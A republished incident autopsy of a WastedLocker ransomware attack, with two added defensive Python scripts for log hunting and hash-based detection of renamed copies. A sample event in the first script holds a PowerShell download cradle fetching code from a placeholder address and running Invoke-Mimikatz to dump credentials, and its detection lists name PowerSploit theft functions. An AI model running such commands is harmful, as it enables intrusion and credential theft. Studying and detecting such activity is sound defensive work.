Alta Pro is committed to keeping you cyber-safe. That’s why we’re so pleased to partner with Tetra Defense – an industry-leading cybersecurity company – on breaking news and key developments on this topic. The following post is an autopsy of a cyber-attack, in which Tetra was called in to neutralize a ransomware attack. It is republished with permission.
WastedLocker attacks have targeted individual organizations within the U.S. and at least 13 other countries, maliciously encrypting them using a number of unique strategies and tools. In this particular case, these tools included social engineering, PowerSploit, Cobalt Strike, Remote Desktop Protocol (RDP), and even a fake Google Chrome update.
After a successful WastedLocker ransomware attack, all accessible user files on a victim’s network are encrypted, and each encrypted file is given a new extension containing the word “wasted”, hence the ransomware’s name.
Method of Compromise: Drive-by Download of SocGholish
An organization in the energy industry fell victim to WastedLocker ransomware in a very innocent way: while conducting COVID-19 related research. During that research, a user on the network browsed an article on a newspaper website that had been compromised to serve the SocGholish framework.
SocGholish is a JavaScript-based malware loader framework, delivered through compromised legitimate websites and styled to look like an ordinary site notice or advertisement. It prompts the user to install an update for trusted software; when the user runs the download, it drops the trojan that sets the rest of the attack in motion. In this case, the newspaper website automatically downloaded a fake Google Chrome update, complete with a prompt for the user to “launch” it. The cooperative and unsuspecting user ran the file, believing they were updating their browser, and the resulting trojan gave the threat actor remote access to the endpoint. No browser exploit was involved: SocGholish relies entirely on the user choosing to run the download.
Symantec confirmed that dozens of U.S. newspaper websites owned by the same parent company were compromised in June, but this method of attack is not unique to newspaper websites: social engineering of this caliber can be hosted on any trusted site in hopes of deceiving unsuspecting users. Symantec also reported “at least 150 other legitimate websites that refer traffic to [other] websites hosting the SocGholish zip file,” which puts its prevalence across the internet into perspective.
- COVID-19 related browser activity: the malicious website required user interaction.
- Fake update with SocGholish lure: when clicked, the trojan was downloaded.
- PowerShell Cobalt Strike loader: gave the threat actor (TA) remote access.
- Cobalt Strike Beacon: gave the TA visibility of the network.
- System utilities: allowed faster deployment of ransomware after reconnaissance.
- WastedLocker execution: malicious encryption, ending with altered filenames.
Evidence of Lateral Movement
Forensic examination revealed that within a few days of gaining access to the victim’s network, the WastedLocker threat actor performed reconnaissance and stole user credentials. Tetra’s investigation also found that the attacker modified a script from yet another tool: PowerSploit.
PowerSploit is an open-source offensive security framework made up of PowerShell modules and scripts for a wide range of penetration testing tasks: code execution, persistence, antivirus bypass, reconnaissance, and exfiltration.
Its modules give attackers several capabilities, including maintaining access to a victim’s network, bypassing antivirus and other security software, recovering passwords held in memory (its Invoke-Mimikatz module), and executing code. In this case, PowerSploit was used to capture network traffic and steal credentials.
Other Threat Actor Tools
Tetra also identified evidence, in the form of resource exhaustion events on other hosts, that the first compromised endpoint (the COVID-19 research device) acted as a machine-in-the-middle (MITM) to intercept traffic. The threat actor captured administrator credentials with this MITM technique and then used them to move laterally to other hosts within the victim’s network.
In the next phase of the attack, Tetra found that Cobalt Strike was used (and later removed) to extend access into the network. Cobalt Strike is an offensive security tool used by both threat actors and legitimate penetration testers; its Beacon implant talks to a command-and-control server over encrypted channels (commonly HTTPS), which lets an operator control compromised hosts covertly. Threat actors use the same channel to exfiltrate data in a manner that victims may not detect. Tetra found evidence of Cobalt Strike execution on several additional hosts on the victim’s network.
The threat actor also used Remote Desktop Protocol (RDP) to move laterally to additional hosts on the victim network. RDP is used not only to log into a network from a computer outside it, but also to reach servers and workstations inside the local network, so “remote” does not always mean the connection originated from an outside source. Tetra identified numerous RDP logins from several compromised machines on the victim’s network, all using credentials scraped from various user accounts. (Windows records such logins in the Security log as event 4624 with logon type 10, RemoteInteractive; a workstation that suddenly opens RDP sessions to many servers is a strong lateral-movement indicator.)
Finally, the threat actor began deploying WastedLocker ransomware to various hosts using RDP and PsExec. PsExec is yet another legitimate system administration tool (from Sysinternals) that runs commands on remote endpoints, typically as a privileged user, by copying a service binary to the target over SMB and starting it as a service; that service installation leaves a record on the target. Threat actors commonly use PsExec during their campaigns to move laterally and deploy software.
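To make the three indicators above concrete (PowerSploit activity in PowerShell script block logs, RDP lateral movement from one source to many hosts, and PsExec service installation), here is an added example of detection logic run over constructed Windows event records. It is not Tetra’s tooling and not part of the original post; the hostnames, addresses, account names and script text are placeholders, and the dictionary fields are a simplified rendering of the real events’ properties.

```python
"""Hunt for the three lateral-movement signals described in the post.

Added example, not Tetra's own tooling. The events below are constructed
for illustration, not taken from the incident, and are shaped after three
real Windows event IDs:
  4104 (Microsoft-Windows-PowerShell/Operational)  script block logging
  4624 (Security)  successful logon; LogonType 10 is RemoteInteractive (RDP)
  7045 (System)    a service was installed; PsExec registers PSEXESVC
"""
from collections import defaultdict

# Constructed sample events (hostnames, addresses and accounts are placeholders).
EVENTS = [
    {"id": 4104, "host": "WS-RESEARCH01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a'); "
               "Invoke-Mimikatz -DumpCreds"},
    {"id": 4624, "host": "FS01",  "logon_type": 10, "user": "CORP\\it.admin", "src_ip": "10.0.5.21"},
    {"id": 4624, "host": "FS01",  "logon_type": 3,  "user": "CORP\\jsmith",   "src_ip": "10.0.5.44"},
    {"id": 4624, "host": "DC01",  "logon_type": 10, "user": "CORP\\it.admin", "src_ip": "10.0.5.21"},
    {"id": 4624, "host": "APP02", "logon_type": 10, "user": "CORP\\it.admin", "src_ip": "10.0.5.99"},
    {"id": 7045, "host": "APP02", "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"id": 7045, "host": "APP02", "service_name": "Spooler",
     "image_path": "%SystemRoot%\\System32\\spoolsv.exe"},
]

# Function names that ship in PowerSploit's Exfiltration and CodeExecution
# modules, plus download-cradle fragments used to stage Cobalt Strike and
# similar payloads in memory.
POWERSPLOIT_MARKERS = ("Invoke-Mimikatz", "Invoke-ReflectivePEInjection",
                       "Invoke-Shellcode", "Get-Keystrokes", "Invoke-NinjaCopy")
CRADLE_MARKERS = ("DownloadString", "IEX", "Invoke-Expression", "FromBase64String")


def suspicious_script_blocks(events):
    """Return 4104 events whose script text contains PowerSploit function
    names or a download cradle, together with the markers that matched."""
    hits = []
    for e in events:
        if e["id"] != 4104:
            continue
        markers = [m for m in POWERSPLOIT_MARKERS + CRADLE_MARKERS if m in e["script"]]
        if markers:
            hits.append({"host": e["host"], "markers": markers})
    return hits


def rdp_fan_out(events, min_targets=2):
    """Map each source address to the distinct hosts it reached over RDP
    (4624 with LogonType 10) and keep only sources that touched at least
    `min_targets` hosts. One machine hopping across several servers is the
    pattern the post describes, not normal administrator behaviour."""
    targets = defaultdict(set)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] == 10:
            targets[e["src_ip"]].add(e["host"])
    return {ip: hosts for ip, hosts in targets.items() if len(hosts) >= min_targets}


def psexec_service_installs(events):
    """Hosts where a 7045 event registered PsExec's service. The default
    service name is PSEXESVC; PsExec's -r switch renames it, so the image
    path is checked as well."""
    hosts = []
    for e in events:
        if e["id"] == 7045 and (e["service_name"].upper() == "PSEXESVC"
                                or "PSEXESVC" in e["image_path"].upper()):
            hosts.append(e["host"])
    return hosts


if __name__ == "__main__":
    for h in suspicious_script_blocks(EVENTS):
        print(f"[4104] {h['host']}: {', '.join(h['markers'])}")
    for ip, hosts in rdp_fan_out(EVENTS).items():
        print(f"[4624] {ip} opened RDP sessions to {sorted(hosts)}")
    for host in psexec_service_installs(EVENTS):
        print(f"[7045] PsExec service installed on {host}")
```

On real data, feed the functions records exported from the event logs (for example via Get-WinEvent or a SIEM), keeping the same field names; the RDP fan-out threshold should be tuned to how many hosts an administrator workstation legitimately reaches in your environment.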
The WastedLocker ransomware executable was named after the victim on most machines, complete with the intimidating “wasted” string. As it ran, however, WastedLocker also created copies of itself under seemingly innocuous names such as Trace.exe, Diag.exe, and Keyboard.exe. It established persistence so that it would run again after a reboot, and deleted these copies once the encryption process completed. Because the renamed copies are the same binary, file hashes rather than file names are the reliable way to find them.
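As an added example (not part of the original post), the following script shows the hash-based check for renamed copies described above. It builds a constructed directory tree in a scratch location, with placeholder file contents standing in for the ransomware binary and a made-up victim-named dropper “acmewasted.exe”, then groups executables by SHA-256 so that one body present under several names is reported as a single group.

```python
"""Find copies of the same executable hiding under different names.

Added example, not part of the original post. The sample directory is
constructed here: the file names follow those the post reports (a
victim-named dropper plus Trace.exe, Diag.exe and Keyboard.exe) and the
file contents are placeholders standing in for the ransomware binary.
"""
import hashlib
import os
import tempfile
from collections import defaultdict

EXE_SUFFIXES = (".exe", ".dll", ".scr")


def sha256_of(path, chunk=1 << 16):
    """Stream the file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_renamed_copies(root):
    """Return groups of executables under `root` that share a SHA-256.
    Distinct legitimate programs do not collide on SHA-256, so any group
    with more than one member is one binary under several names."""
    by_hash = defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(EXE_SUFFIXES):
                path = os.path.join(dirpath, name)
                by_hash[sha256_of(path)].append(path)
    return [sorted(paths) for paths in by_hash.values() if len(paths) > 1]


def build_sample(root):
    """Constructed on-disk layout: one stand-in ransomware body under four
    names, plus an unrelated stand-in program that must not be flagged."""
    ransomware_body = b"MZ" + b"\x90" * 64 + b"constructed-wastedlocker-stand-in"
    other_body = b"MZ" + b"\x90" * 64 + b"constructed-unrelated-program"
    temp_dir = os.path.join(root, "Windows", "Temp")
    os.makedirs(temp_dir, exist_ok=True)
    for name in ("acmewasted.exe", "Trace.exe", "Diag.exe", "Keyboard.exe"):
        with open(os.path.join(temp_dir, name), "wb") as f:
            f.write(ransomware_body)
    with open(os.path.join(root, "Windows", "notepad.exe"), "wb") as f:
        f.write(other_body)


def demo():
    """Build the sample tree in a scratch directory and return the flagged
    groups as lists of base names, so the result is stable across machines."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return [[os.path.basename(p) for p in group]
                for group in find_renamed_copies(root)]


if __name__ == "__main__":
    for group in demo():
        print("same binary under several names:", ", ".join(group))
```

Against a real host, point find_renamed_copies at the volume root (or at the temp and user-profile directories first, where droppers usually land) and compare the resulting hashes with known WastedLocker samples; the grouping itself needs no signature.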